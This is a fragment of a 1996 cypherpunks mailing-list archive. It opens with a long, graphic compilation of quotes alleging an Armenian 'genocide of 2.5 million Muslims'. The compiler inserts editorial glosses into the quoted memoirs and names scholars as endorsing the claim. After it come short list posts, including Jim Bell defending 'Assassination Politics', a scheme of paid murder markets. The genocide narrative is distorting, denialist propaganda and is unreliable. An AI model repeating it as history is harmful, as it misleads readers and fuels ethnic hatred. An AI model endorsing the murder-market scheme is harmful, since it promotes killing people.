 and have staged massacres in Zangezour, Surmali, Etchmiadzin, and
 Zangibasar. This is intolerable. Look - and here he pointed to a
 file of official documents on the table - look at this, here in
 December are the reports of the last few months concerning ruined
 Muslim villages which my representative Wardrop has sent me. The
 official Tartar communique speaks of the destruction of 300 villages
 by the Armenians._

p. 54 (fifth paragraph).

_Yes, of course. I repeat, until this massacre of the Muslim is
 stopped and the three chiefs are not removed from your military
 leadership I hardly think we can supply you arms and ammunition._

_It is the armed bands led by Dro, Hamazasp and Kulkhandanian who
 during the past months have raided and destroyed many Muslim villages
 in the regions of Surmali, Etchmiadzin, Zangezour, and Zangibasar.
 There are official charges of massacres by the Armenians._


Doc. Dr. Azmi Suslu, _Russian View on the Genocide Committed by
                      the Armenians Against the Muslims_ 1987,
                      pp. 45-53.

_The killings were organized by the doctors and the employers, and
 the act of killing was committed solely by the Armenian Army. More
 than eighty thousand unarmed and defenceless Muslims have been massacred
 in Erzincan and Erzurum. Large holes were dug and the defenceless
 Muslims were slaughtered like animals next to the holes. Later, the
 murdered Muslims were thrown into the holes. The Armenian who stood
 near the hole would say when the hole was filled with the corpses:
 'Seventy dead bodies, well, this hole can take ten more.' Thus ten
 more Muslims would be cut into pieces, thrown into the hole, and when
 the hole was full it would be covered over with soil.

 The Armenians responsible for the act of murdering would frequently
 fill a house with eighty Muslims, and cut their heads off one by one.
 Following the Erzincan massacre, the Armenians began to withdraw
 towards Erzurum... The Armenian Army among those who withdrew to
 Erzurum from Erzincan raided the Moslem villages on the road, and
 destroyed the entire population, together with the villages._


A. Rawlinson, _Adventures in the Near East_
Jonathan Cape, 30 Bedford Square, London, 1934
(First published 1923) (287 pages).
_Memoirs of a British officer who witnessed the
 Armenian genocide of 2.5 million Muslim people_

p. 184 (second paragraph)

_I had received further very definite information of horrors
 that had been committed by the Armenian soldiery in Kars Plain,
 and as I had been able to judge of their want of discipline by
 their treatment of my own detached parties, I had wired to Tiflis
 from Zivin that 'in the interests of humanity the Armenians should
 not be left in independent command of the Moslem population, as,
 their troops being without discipline and not under effective control,
 atrocities were constantly being committed, for which we should with
 justice eventually be held to be morally responsible'_



A. Rawlinson, _Adventures in the Near East_
Jonathan Cape, 30 Bedford Square, London, 1934
(First published 1923) (287 pages).
_Memoirs of a British officer who witnessed the
 Armenian genocide of 2.5 million Muslim people_


p. 178 (first paragraph)

_In those Moslem villages in the plain below which had been
 searched for arms by the Armenians everything had been taken
 under the cloak of such search, and not only had many Moslems
 been killed by the Armenian Army, but horrible tortures had
 been inflicted in the endeavour to obtain information as to
 where valuables had been hidden, of which the Armenians were
 aware of the existence, although they had been unable to find
 them._


p. 177 (third paragraph)

_Armenian troops have pillaged and destroyed all the Moslem
 villages in the plain. Caravans of refugees were in the meanwhile
 constantly arriving from the plain, from which the whole Moslem
 population was fleeing with as much of their personal property as
 they could transport, seeking to obtain security and protection._



A. Rawlinson, _Adventures in the Near East_
Jonathan Cape, 30 Bedford Square, London, 1934
(First published 1923) (287 pages).
_Memoirs of a British officer who witnessed the
 Armenian genocide of 2.5 million Muslim people_


p. 175 (first paragraph)

_The arrival of this British brigade was followed by the
 announcement that Kars Province had been allotted by the
 Supreme Council of the Allies to the Armenians, and that
 announcement having been made, the British troops were then
 completely withdrawn, and Armenian occupation commenced. Hence
 all the trouble; for the Armenians at once commenced the wholesale
 robbery and persecution of the Muslem population on the pretext
 that it was necessary forcibly to deprive them of their arms.
 In the portion of the province which lies in the plains they
 were able to carry out their purpose, and the manner in which
 this was done will be referred to in due course._

p. 181 (first paragraph)

_The Armenians from the plain were attacking the Kurdish people
 with artillery, with a large force in support._


Robert Dunn, _World Alive, A Personal Story_
Crown Publishers, Inc., New York (1952).
_Memoirs of an American officer who witnessed the
 Armenian genocide of 2.5 million Muslim people_

p. 361 (seventh paragraph) and p. 362 (first paragraph).

 'The most of the Muslims slaughtered by the Armenians are
  inside houses. Come you and look.'
 'No, dammit! My stomach isn't-'
 _We were under those trees by the mosque, in an open space.
 'I don't believe you,' I said, but followed to a nail-studded
  door. The man pushed it ajar, then spurred away, leaving me
  to check on the corpse. I thought I should, this charge was
  so constant, so gritted my teeth and went inside.

  The place was cool but reeked of sodden ashes, and was dark
  at first, for its stone walls had only window slits. Rags
  strewed the mud floor around an iron tripod over embers that
  vented their smoke through roof beams black with soot. All
  looked bare and empty, but in an inner room flies buzzed. As
  the door swung shut behind me I saw they came from a man's
  body lying face up, naked but for its grimy turban. He was
  about fifty years old by what was left of his face - a rifle
  butt had bashed an eye. The one left slanted, as with Tartars
  rather than with Kurds. Any uniform once on him was gone, so
  I'd no proof which he was, and quickly went out, gagging at
  the mess of his slashed genitals._


Robert Dunn, _World Alive, A Personal Story_
Crown Publishers, Inc., New York (1952).
_Memoirs of an American officer who witnessed the
 Armenian genocide of 2.5 million Muslim people_

p. 363 (first paragraph).

 'How many Muslim people lived there?'
 'Oh, about eight hundred.' He yawned.
 'Did you see any Muslim officers?'
 'No, sir. I was in at dawn. All were Tartar civilians in mufti.'

_The lieutenant dozed off, then I, but in the small hours a
 voice woke me - Dro's [Armenian architect of the genocide
 of 2.5 million Muslim people - ye]. He stood in the starlight
 bawling out an officer. Anyone keelhauled so long and furiously
 I'd never heard. Then abruptly Dro broke into laughter, quick
 and simple as child's. Both were a cover for his sense of guilt,
 I thought, or hoped. For somehow, despite my boast of irreligion,
 Christian Armenian massacring 'infidels' was more horrible than
 the reverse would have been.

 From daybreak on, Armenian villagers poured in from miles around.
 The Armenian women plundered happily, chattering like ravens as
 they picked over the carcass of Djul. They hauled out every hovel's
 chattels, the last scrap of food or cloth, and staggered away, packing
 pots, saddlebags, looms, even spinning-wheels.

 'Thank you for a lot, Dro,' I said to him back in camp. 'But now I
 must leave.' We shook hands, the captain said 'A bientot, mon camarade.'
 And for hours the old Molokan scout and I plodded north across parching
 plains. Like Lot's wife I looked back once to see smoke bathing all,
 doubtless in a sack of other Moslem villages by the Armenian Army up to
 the line of snow that was Iran.'_


Robert Dunn, _World Alive, A Personal Story_
Crown Publishers, Inc., New York (1952).
_Memoirs of an American officer who witnessed the
 Armenian genocide of 2.5 million Muslim people_


p. 354.

_At morning tea, Dro [Armenian architect of the genocide of 2.5
 million Muslim people - ye] and his officers spread out a map
 of this whole high region called the Karabakh. Deep in tactics,
 Armenians spoke Russian, but I got their contempt for Allied
 'neutral' zones and their distrust of promises made by tribal
 chiefs. A campaign shaped; more raids on Moslem villages._

p. 358.

"It will be three hours to take," Dro told me. We'd close in on
 three sides.
"The men on foot will not shoot, but use only the bayonets,"
 Merrimanov said, jabbing a rifle in dumbshow.
"That is for morale," Dro put in. "We must keep the Moslems in
 terror."
"Soldiers or civilians?" I asked.
"There is no difference," said Dro. "All are armed, in uniform
 or not."
"But the women and children?"
"Will fly with the others as best they may."


Robert Dunn, _World Alive, A Personal Story_
Crown Publishers, Inc., New York (1952).
_Memoirs of an American officer who witnessed the
 Armenian genocide of 2.5 million Muslim people_

p. 360.

_The ridges circled a wide expanse, its floors still. Hundreds
 of feet down, the fog held, solid as cotton flock. 'Djul lies
 under that,' said Dro [Armenian architect of the genocide of
 2.5 million Muslim people - ye], pointing. 'Our men also attack
 Muslims from the other sides.'

 Then, 'Whee-ee!' - his whistle lined up all at the rock edge.
 Bayonets clicked upon carbines. Over plunged Archo, his black
 haunches rippling; then followed the staff, the horde - nose
 to tail, bellies taking the spur. Armenia in action seemed more
 like a pageant than war, even though I heard our Utica brass roar.

 As I watched from the height, it took ages for Djul to show clear.
 A tsing of machine-gun fire took over from the thumping batteries;
 cattle lowed, dogs barked, invisible, while I ate a hunk of cheese
 and drank from a snow puddle. Mist at last folded upward as men
 shouted, at first heard faintly. Then came a shrill wailing.

 Now among the cloud-streaks rose darker wisps - smoke. Red glimmered
 about house walls of stone or wattle, into dry weeds on roofs. A
 mosque stood in clump of trees, thick and green. Through crooked
 alleys on fire, horsemen were galloping after figures both mounted
 and on foot.

 'Tartarski!' shouted the Armenian gunner by me. Others pantomimed
 them in escape over the rocks, while one twisted a bronze shell-nose,
 loaded, and yanked breech-cord, firing again and again. Shots wasted,
 I thought, when by afternoon I looked in vain for fallen branch or
 Muslim body. But these shots and the white bursts of shrapnel in the
 gullies drowned the women's cries.

 At length all shooting petered out. I got on my horse and rode down
 toward Djul. It burned still but little flame showed now. The way was
 steep and tough, through dense scrub. Finally on flatter ground I came
 out suddenly, through alders, on smoldering houses. Across trampled
 wheat my brothers-in-arms were leading off animals, several calves
 and a lamb._


Robert Dunn, _World Alive, A Personal Story_
Crown Publishers, Inc., New York (1952).
_Memoirs of an American officer who witnessed the
 Armenian genocide of 2.5 million Muslim people_

p. 361 (fourth paragraph).

_Armenian corpses came next, the first a pretty Muslim child with
 straight black hair, large eyes. She looked about twelve years old.
 She lay in some stubble where meal lay scattered from the sack
 she'd been toting. The bayonet had gone through her back, I judged,
 for blood around was scant. Between the breasts one clot, too small
 for a bullet wound, crusted her homespun dress.

 The next was a Muslim boy of ten or less, in rawhide jacket and
 knee-pants. He lay face down in the path by several huts. One arm
 reached out to the pewter bowl he'd carried, now upset upon its
 dough. Steel had jabbed just below his neck, into the spine.

 There were Muslim grownups, too, I saw as I led the sorrel around.
 Djul was empty of the living till I looked up to see beside me Dro's
 [Armenian architect of the genocide of 2.5 million Muslim people - ye]
 German-speaking colonel. He said all Muslims who had not escaped were
 dead._


Robert Dunn, _World Alive, A Personal Story_
Crown Publishers, Inc., New York (1952).
_Memoirs of an American officer who witnessed the
 Armenian genocide of 2.5 million Muslim people_

p. 358.

 _More stories of Armenian murdering Muslims when the czarist troops
  fled north. My Armenian hosts told me of their duty here: to keep
  tabs on brigands, Muslim troop shifts, hidden arms, spies - Christian,
  Red or Tartar - coming in from Transcaucasus. Then they spoke of the
  hell that would break loose if Versailles were to put, as threatened,
  the Muslim vilayets of Turkey under the control of Erevan.

  Muslims under Christian rule? His lips smacked in irony under the
  droopy red moustache. That's bloodshed - just Smyrna over again on
  a bigger scale._

 _The Armenians did exterminate the entire Muslim population
  of Russian Armenia as Muslims were considered inferior to
  the Armenians by the prominent leaders of the Dashnaks._
                                    _Mikael Kaprilian_ 1919

 Sahak Melkonian, _Preserving the Armenian Purity_ 1920

_In Soviet Armenia today there no longer exists a single Turkish
 soul. It is in our power to tear away the veil of illusion that
 some of us create for ourselves. It certainly is possible to severe
 the artificial life-support system of an imagined 'ethnic purity'
 that some of us falsely trust as the only structure that can support
 their heart beats in this alien land._


During the First World War and the ensuing years - 1914-1920,
the Armenians through a premeditated and systematic genocide,
tried to complete its centuries-old policy of annihilation against
the Turks and Kurds by savagely murdering 2.5 million Muslims and
deporting the rest from their 1,000 year homeland.

The attempt at genocide is justly regarded as the first instance
of Genocide in the 20th Century acted upon an entire people.
This event is incontrovertibly proven by historians, government
and international political leaders, such as U.S. Ambassador Mark
Bristol, William Langer, Ambassador Layard, James Barton, Stanford
Shaw, Arthur Chester, John Dewey, Robert Dunn, Papazian, Nalbandian,
Ohanus Appressian, Jorge Blanco Villalta, General Nikolayef, General
Bolkovitinof, General Prjevalski, General Odiselidze, Meguerditche,
Kazimir, Motayef, Twerdokhlebof, General Hamelin, Rawlinson, Avetis
Aharonian, Dr. Stephan Eshnanie, Varandian, General Bronsart, Arfa,
Dr. Hamlin, Boghos Nubar, Sarkis Atamian, Katchaznouni, Rachel
Bortnick, Halide Edip, McCarthy, W. B. Allen, Paul Muratoff and many
others.

J. C. Hurewitz, Professor of Government Emeritus, Former Director of
the Middle East Institute (1971-1984), Columbia University.

Bernard Lewis, Cleveland E. Dodge Professor of Near Eastern History,
Princeton University.

Halil Inalcik, University Professor of Ottoman History & Member of
the American Academy of Arts & Sciences, University of Chicago.

Peter Golden, Professor of History, Rutgers University, Newark.

Stanford Shaw, Professor of History, University of California at
Los Angeles.

Thomas Naff, Professor of History & Director, Middle East Research
Institute, University of Pennsylvania.

Ronald Jennings, Associate Professor of History & Asian Studies,
University of Illinois.

Howard Reed, Professor of History, University of Connecticut.

Dankwart Rustow, Distinguished University Professor of Political
Science, City University Graduate School, New York.

John Woods, Associate Professor of Middle Eastern History,
University of Chicago.

John Masson Smith, Jr., Professor of History, University of
California at Berkeley.

Alan Fisher, Professor of History, Michigan State University.

Avigdor Levy, Professor of History, Brandeis University.

Andreas G. E. Bodrogligetti, Professor of History, University of California
at Los Angeles.

Kathleen Burrill, Associate Professor of Turkish Studies, Columbia University.

Roderic Davison, Professor of History, George Washington University.

Walter Denny, Professor of History, University of Massachusetts.

Caesar Farah, Professor of History, University of Minnesota.

Tom Goodrich, Professor of History, Indiana University of Pennsylvania.

Tibor Halasi-Kun, Professor Emeritus of Turkish Studies, Columbia University.

Justin McCarthy, Professor of History, University of Louisville.

Jon Mandaville, Professor of History, Portland State University (Oregon).

Robert Olson, Professor of History, University of Kentucky.

Madeline Zilfi, Professor of History, University of Maryland.

James Stewart-Robinson, Professor of Turkish Studies, University of Michigan.

_long list deleted_


_Newsweek_ (November 29, 1993, p. 50)
	

   _Armenians occupy a quarter of Azerbaijan's territory, and
    they've displaced almost a million Azerbaijani civilians.
    Friends of Armenia's powerful lobby in Washington, including
    the U.S. Government are suddenly a bit aghast. 'What we see
    now is a systematic destruction of every village in their
    way' says a senior state department official. It's vandalism._



_THE GUARDIAN_, 2 September 1993


       NOWHERE TO HIDE FOR AZERI REFUGEES

Armenia is pushing a new wave of displaced people towards Iran.
Jonathan RUGMAN in Kanliq, south-west Azerbaijan, reports

On  the main road south through Kubatli province, thousands  of
men,  women  and children are packed into trucks  at  an  Azeri
checkpoint waiting for permission to leave. Helicopters shuttle
in and out with the wounded, while a group of women sit wailing
at the roadside, tearing at their bloodstained faces with their
fingernails in a frenzy of grief.

A  new  exodus  of  refugees is under way towards  Azerbaijan's
border  with  Iran as Armenia forces continue  ignoring  United
Nations  demands that they stop their offensive.

This  week the UNHCR began distributing 4,000 tents and  50,000
blankets  to  those  displaced in the recent  hostilities.  The
organisation  said about 250,000 Azeris have been displaced  so
far  this year and about 1 million since the massacre began  in
1988.

[Photo:] A man carries his elderly mother in the capital Baku. The
UN says about 250,000 Azeris have been displaced this year.

[Map: Shows areas invaded by Armenians]




_Newsweek_ 16 March 1992

By Pascal Privat with Steve Le Vine in Moscow


             THE FACE OF A MASSACRE

Azerbaijan was a charnel house again last week:  a  place
of  mourning  refugees  and  dozens  of  mangled  corpses
dragged  to  a  makeshift morgue behind the mosque.  They
were  ordinary  Azerbaijani men, women  and  children  of
Khojaly, a  small village  in  war-torn  Nagorno-Karabakh
overrun  by  Armenian  forces on Feb.  25-26.  Many  were
killed  at  close range while trying to  flee;  some  had
their  faces  mutilated, others were scalped.  While  the
victims' families mourned,

Photo: `We will never forgive the Armenians': Azeri woman
       mourn a victim.




_The New York Times_, Tuesday, March 3, 1992


                    MASSACRE BY ARMENIANS

Agdam, Azerbaijan, March 2 (Reuters) - Fresh evidence emerged
today of a massacre of civilians by Armenian militants in
Nagorno-Karabakh, a predominantly Armenian enclave of Azerbaijan.

                         Scalping Reported

Azerbaijani officials and journalists who flew briefly to the region
by helicopter brought back three dead children with the back of their
heads blown off. They said shooting by Armenians has prevented them
from retrieving more bodies.

"Women and children have been scalped," said Assad Faradshev, an aide
to Nagorno-Karabakh's Azerbaijani Governor. "When we began to pick up
bodies, they began firing at us."

The Azerbaijani militia chief in Agdam, Rashid Mamedov, said: "The
bodies are lying there like flocks of sheep. Even the fascists did
nothing like this."

                         Truckloads of Bodies

Near Agdam on the outskirts of Nagorno-Karabakh, a Reuters photographer,
Frederique Lengaigne, said she had seen two trucks filled with Azerbaijani
bodies.

"In the first one I counted 35, and it looked as though there were as
many in the second," she said. "Some had their head cut off, and many
had been burned. They were all men, and a few had been wearing khaki
uniforms."




_The Sunday Times_ 1 March 1992

By Thomas Goltz, Agdam, Azerbaijan


    ARMENIAN SOLDIERS MASSACRE HUNDREDS OF FLEEING FAMILIES

Survivors reported that Armenian soldiers shot and bayoneted more
than 450 Azeris, many of them women and children. Hundreds, possibly
thousands, were missing and feared dead.

The attackers killed most of the soldiers and volunteers defending
the women and children. They then turned their guns on the terrified
refugees. The few survivors later described what happened: 'That's
when the real slaughter began,' said Azer Hajiev, one of three soldiers
to survive. 'The Armenians just shot and shot. And then they came in
and started carving up people with their bayonets and knives.'

'They were shooting, shooting, shooting,' echoed Rasia Aslanova, who
arrived in Agdam with other women and children who made their way
through Armenian lines. She said her husband, Kayun, and a son-in-law
were massacred in front of her. Her daughter was still missing.

One boy who arrived in Agdam had an ear sliced off.

The survivors said 2000 others, some of whom had fled separately,
were still missing in the gruelling terrain; many could perish from
their wounds or the cold.

By late yesterday, 479 deaths had been registered at the morgue in
Agdam's morgue, and 29 bodies had been buried in the cemetery. Of
the seven corpses I saw awaiting burial, two were children and three
were women, one shot through the chest at point blank range.

Agdam hospital was a scene of carnage and terror. Doctors said they
had 140 patients who escaped slaughter, most with bullet injuries or
deep stab wounds.

Nor were they safe in Agdam. On friday night rockets fell on the city
which has a population of 150,000, destroying several buildings and
killing one person.



_The Times_ 2 March 1992

              CORPSES LITTER HILLS IN KARABAKH

   (ANATOL LIEVEN COMES UNDER FIRE WHILE FLYING TO INVESTIGATE
       THE MASS KILLINGS OF REFUGEES BY ARMENIAN TROOPS)

As we swooped low over the snow-covered hills of Nagorno-Karabagh
we saw the scattered corpses. Apparently, the refugees had been
shot down as they ran. An Azerbaijani film of the places we flew
over, shown to journalists afterwards, showed DOZENS OF CORPSES
lying in various parts of the hills.

The Azerbaijanis claim that AS MANY AS 1000 have died in a MASS
KILLING of AZERBAIJANIS fleeing from the town of Khodjaly, seized
by Armenians last week. A further 4,000 are believed to be wounded,
frozen to death or missing.

The civilian helicopter's job was to land in the mountains and pick
up bodies at sites of the mass killings.

The civilian helicopter picked up four corpses, and it was during
this and a previous mission that an Azerbaijani cameraman filmed
the several dozen bodies on the hillsides.

Back at the airfield in Agdam, we took a look at the bodies the
civilian helicopter had picked up. Two old men a small girl were
covered with blood, their limbs contorted by the cold and rigor
mortis. They had been shot.




_TIME_ March 16, 1992


By Jill SMOLOWE

-Reported by Yuri ZARAKHOVICH/Moscow


          M A S S A C R E  I N  K H O J A L Y

While the details are argued, this much is plain: something grim
and unconscionable happened in the Azerbaijani town of Khojaly
two weeks ago. So far, some 200 dead Azerbaijanis, many of them
mutilated, have been transported out of the town tucked inside
the Armenian-dominated enclave of Nagorno-Karabakh for burial in
neighboring Azerbaijan. The total number of deaths - the Azerbaijanis
claim 1,324 civilians have been slaughtered, most of them women and
children - is unknown.

Videotapes circulated by the Azerbaijanis include images of defaced
civilians, some of them scalped, others shot in the head.




_BBC1 Morning News at 07.37, Tuesday 3 March 1992_

BBC reporter was live on line and he claimed that he saw more
than 100 bodies of Azeri men, women and children as well as a
baby who are shot dead from their heads from a very short distance.

_BBC1 Morning News at 08:12, Tuesday 3 March 1992_

Very disturbing picture has shown that many civilian corpses
who were picked up from mountain. Reporter said he, cameraman
and Western Journalists have seen more than 100 corpses, who
are men, women, children, massacred by Armenians. They have
been shot dead from their heads as close as 1 meter. Picture
also has shown nearly ten bodies (mainly women and children)
are shot dead from their heads. Azerbaijan claimed that more
than 1000 civilians massacred by Armenian forces.

_Channel 4 News at 19.00, Monday 2 March 1992_

2 French journalists have seen 32 corpses of men, women and
children in civilian clothes. Many of them shot dead from
their heads as close as less than 1 meter.


_Report from Karabakpress_

A merciless massacre of the civilian population of the small
Azeri town of Khojali (Population 6000) in Karabagh, Azerbaijan,
is reported to have taken place on the night of February 28 by
the Soviet Armenian Army. Close to 1000 people are reported to
have been massacred. Elderly and children were not spared. Many
were badly beaten and shot at close range. A sense of rage and
helplessness has overwhelmed the Azeri population in face of the
well armed and equipped Armenian Army. The neighboring Azeri city
of Aghdam outside of the Karabagh region has come under heavy
Armenian artillery shelling. City hospital was hit and two pregnant
women as well as a new born infant were killed. Azerbaijan is appealing
to the international community to condemn such barbaric and ruthless
attacks on its population and its sovereignty.





_Boston Sunday Globe_ November 21, 1993

by Jon Auerbach
Globe Correspondent

CHAKHARLI, Azerbaijan -- The truckloads of scared and lost
children, the sobbing mothers, the stench of sickness and
the sea of blank faces in this mud-covered refugee camp
obscure the deeper issue of why tens of thousands of Azeris
have fled here.

_What we see now is a systematic destruction of every village
 in their way,_ said one senior US official. _It's one of the
 most disgusting things we've seen._

_It's vandalism,_ the US official said. _The idea that there
 is an aggressive intent in a sound conclusion._

The United Nations estimates that there are more than 1 million
refugees in Azerbaijan, roughly one seventh of the former Soviet
republic's entire population. Thousands who fled to neighboring
Iran are being slowly repatriated to refugee camps already bursting
at the seams. But because of the Karabakh Armenians' policy of
burning villages, relief organizations say there is no hope that
the Azeris could return home anytime soon.

At Chakharli, about 10 miles from Iran, more than 10,000 refugees
are crammed into a makeshift tent city. Aziz Azizova, 33, arrived
in the Iranian run camp about three weeks ago, after she and her
five children were forced to flee their home in the village of
Buik-Merjan.

_I left my village with nothing, not even my shoes,_ she said. _You
see how our children are living? Some of them are living right in
the mud._

Azizova, like thousands of others, escaped by fleeing across the Arax
River into neighboring Iran. The UN estimates that around 300 Azeris,
mainly women and children, drowned in the river's currents.

One of the people who did make it across was Samaz Mamedova, a
40-year-old accountant. Sitting with friends in tent No. 566 on
a recent day, Mamedova explained how the Armenians seized her
village in less than a half hour, forcing the entire population
toward the river in a chaotic scramble for survival.




_Cebbar Leygara_ Kurdish Leader - October 13, 1992

 _Today's ethnic cleansing policies by the Serbians against Croatians
  and Muslims of Yugoslavia, as well as the Soviet Republic of Armenia's
  against the Muslim population of neighboring Azerbaijan, are really
  no different in their aspirations than the genocide perpetrated by
  the Armenian Government 78 years ago against the Turkish and Kurdish
  Muslims and Sephardic Jews living in these lands._


_Tovfik Kasimov_ Azeri Leader - September 25, 1992

 _The crime of systematic cleansing by mass killing and extermination
  of the Muslim population in Soviet Republic of Armenia, Karabag,
  Bosnia and Herzegovina is an 'Islamic Holocaust' comparable to the
  extermination of 2.5 million Muslims by the Armenian Government
  during the WWI and of over 6 million European Jews during the WWII._





_The Times_ 3 March 1992


                   MASSACRE UNCOVERED

By ANATOL LIEVEN

More than sixty bodies, including those of women and children,
have been spotted on hillsides in Nagorno-Karabakh, confirming
claims that Armenian troops massacred Azeri refugees. Hundreds
are missing.

Scattered amid the withered grass and bushes along a small valley
and across the hillside beyond are the bodies of last Wednesday's
massacre by Armenian forces of Azerbaijani refugees.

In all, 31 bodies could be counted at the scene. At least another
31 have been taken into Agdam over the past five days. These figures
do not include civilians reported killed when the Armenians stormed
the Azerbaijani town of Khodjaly on Tuesday night. The figures also
do not include other as yet undiscovered bodies

Zahid Jabarov, a survivor of the massacre, said he saw up to 200
people shot down at the point we visited, and refugees who came
by different routes have also told of being shot at repeatedly and
of leaving a trail of bodies along their path. Around the bodies
we saw were scattered possessions, clothing and personnel documents.
The bodies themselves have been preserved by the bitter cold which
killed others as they hid in the hills and forest after the massacre.
All are the bodies of ordinary people, dressed in the poor, ugly
clothing of workers.

Of the 31 we saw, only one policeman and two apparent national
volunteers were wearing uniform. All the rest were civilians,
including eight women and three small children. Two groups,
apparently families, had fallen together, the children cradled
in the women's arms.

Several of them, including one small girl, had terrible head
injuries: only her face was left. Survivors have told how they
saw Armenians shooting them point blank as they lay on the ground.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sat, 19 Oct 1996 10:35:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Mondex
Message-ID: <199610190700.JAA18790@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May must have been sharing needles with a rabid hedgehog.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Denny" <rdenny@[38.248.4.2]>
Date: Sat, 19 Oct 1996 10:32:47 -0700 (PDT)
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Crypto: Systems & Application Developers Wanted
In-Reply-To: <Pine.SCO.3.93.961015185241.9275C-100000@grctechs.va.grci.com>
Message-ID: <9610190913.ZM-78249@r1830.dc3.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark and friends -

I just returned from the Internet Expo in Boston, at which the NSA had a booth 
where they were pushing the FORTEZZA card. Some interesting things (at least 
to me):

* Netscape has a working prototype of their browser and server that uses
  FORTEZZA for encryption

* There are three (or 4??) companies building FORTEZZA cards, including 
  National Semi (the only one I recognized).

* The NSA guy I talked to said that they planned to market a "token card" 
  that uses RSA/DES, instead of Skipjack and friends, "sometime next year".

  -- Bob

"Mark O. Aldrich" <maldrich@grci.com> wrote:
> Uh, excuse me, but doesn't SPYRUS in fact market a Fortezza card?  The
> very same card being used by the Evil Empire to spread diseased and impure
> so-called "cryptography" (with GAK permanently embedded into it) to the
> uninformed minions? 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 19 Oct 1996 10:33:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: JUN_tas
Message-ID: <1.5.4.32.19961019134550.00675f9c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-19-96. WaPo:

   "Story of How an Unknown American Linguist Broke Soviet
   Wartime Spy Code Finally Emerges From Shadows"

      NSA's legendary cryptlinguist Meredith Knox Gardner
      emerged from a lifetime of anonymity to tell his story
      at a conference devoted to the "Venona" code break.

      NSA historians have been unable to come up with any
      evidence that President Truman was ever informed of
      Venona. Mystery also continues to surround the
      government's failure to prosecute Theodore Alvin Hall,
      a Harvard physicist working at Los Alamos and Bill
      Weisband, a Soviet emigre working with Gardner at NSA,
      even though Venona decrypts revealed the two as spies.

      Gardner believes that the intelligence chiefs withheld
      the information from Truman because they were afraid
      that he would "give away the secret. You can't imagine
      how the intelligence agencies guard secrecy."

   -----

   http://jya.com/juntas.txt  (20 kb)

   ftp://jya.com/pub/incoming/juntas.txt

   JUN_tas











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 19 Oct 1996 10:45:56 -0700 (PDT)
To: Hallam-Baker <cypherpunks@toad.com
Subject: Re: is there no end to AP & Creative Wiretap Arguments?
Message-ID: <199610191745.KAA15143@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 AM 10/18/96 -0400, Hallam-Baker wrote:
>Steve Schear wrote:
>
>> How about as a means of coercing war criminals ethnic purgers, as those in
>> Bosnia/Serbia, to turn themselves in to proper tribunals for judging.
>> Having AP bettors wager $100,000s on your untimely retirement, unless you
>> turn yourself in, could induce one to consider conventional justice.
>
>On the other hand it would provide said war criminals with a convenient
>mechanism for carrying out their crimes. 

Actually, no.  AP "stacks the deck" dramatically against those few who 
engage in war crimes.  People from all sides of a dispute who object to them 
can donate, and anybody considering participating in war crimes has to keep 
this absolutely secret.  


>It does not work for Bell and his appologists to wave their hands and
>say "trust me it will be better". There is absolutely no reason to
>believe that AP markets would be used by anyone but psychopaths. 

>No mechanism is proposed which restricts the purposes to which the AP
>markets can be put. They would inevitably be used by the KKK and
>neo-NAZI groups for hate-crimes.

How long do you think that such groups would last with AP functional?  
Consider all those bleeding-hearts who are going to be voting for Clinton 
this year.  I expect that many of them would gladly donate money to see 
organizations like the KKK dead.    How effective will these 
hate-organizations be if they're running for their lives?


>> All human rights are Naturally derived as are the 'Laws of the Jungle'.
>> Governments instituted among men should derive their rights from the
>> soverignty of its citizens.  Unfortunately, many countries choose to ignore
>> this.  AP should serve an occassionally competitive system to keep the
>> 'duly consistuted' system on its toes lest those in authority reap the law
>> of the jungle.
>
>Rights do not exist outside a legal framework that supports them.

Many if not most philosophers disagree.  My _opinion_ of my rights exists, 
and for the vast majority of the  people that's quite enough to remind them 
to steer clear.


>Arguments
>from natural law have been discredited for 300+ years. Such arguments
>merely reify the prejudices of one society into axiomatic rights without
>the bother of having to justify them. There is no logical basis to
>prefer the "rights" of th US constitution over the "rights" recognised
>by the Islamic Jihad.

Since "they live there" and "we live here" there doesn't have to be any 
contradiction in this.

>If you read the US declaration of Independence it is very clear that its
>authors rejected natural law arguments. The rights that they hold to be
>"self evident" are extreemly abstract principles which could be
>justified within almost any ethical system. The removal of the word
>"God" was deliberate and reflects a concious rejection of the natural
>law argument. 

AP is not dependant on any sort of "natural law" argument.  It doesn't 
really matter where you got the opinion of your rights that you have.  
"Natural law," or "gift of God," or anything else.  Most of the time things 
will work out just fine.  True, if you start believing that you have a right 
to a dozen free doughnuts per day from the shop down the street, and the 
owner of that shop disagrees, there may be a dispute.  However, I suggest 
that disputes of this kind will be rare and short-lived, for reasons which 
should be obvious: You may have wanted a dozen doughnuts, but you'll end up 
with a dozen holes!


>AP is self-contradictory. It claims to uphold "rights" by infringing
>them massively and disproportionately and in such a way that no rights
>would remain. 

It's odd that you would say this.  Most societies operate today against 
crime by putting people in jails, which would (absent a crime to justify 
this) be a violation of THEIR rights.  

As for whether this is "disproportionate"...   Let's see, a person can 
easily get a few years in jail for doing a bank robbery where he gets a 
thousand dollars or so.  Yet, there were a number of bankers in the 1980's 
in the US who got no greater sentences for stealing tens or even hundreds of 
millions of dollars.  You find the "proportionality" in this and send me a 
note.

My solution is to allow the victims of a crime to purchase the punishment of 
the criminal, which I claim will be a fair fairer solution, and one that 
will accomplish far more deterrence than the status quo.


>It is impossible to justify AP except in extreeme
>authoritarian terms that could be used to justify any system of
>government. 
>	Phill

Some of us seem to disagree.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott J. Schryvers" <schryver@radiks.net>
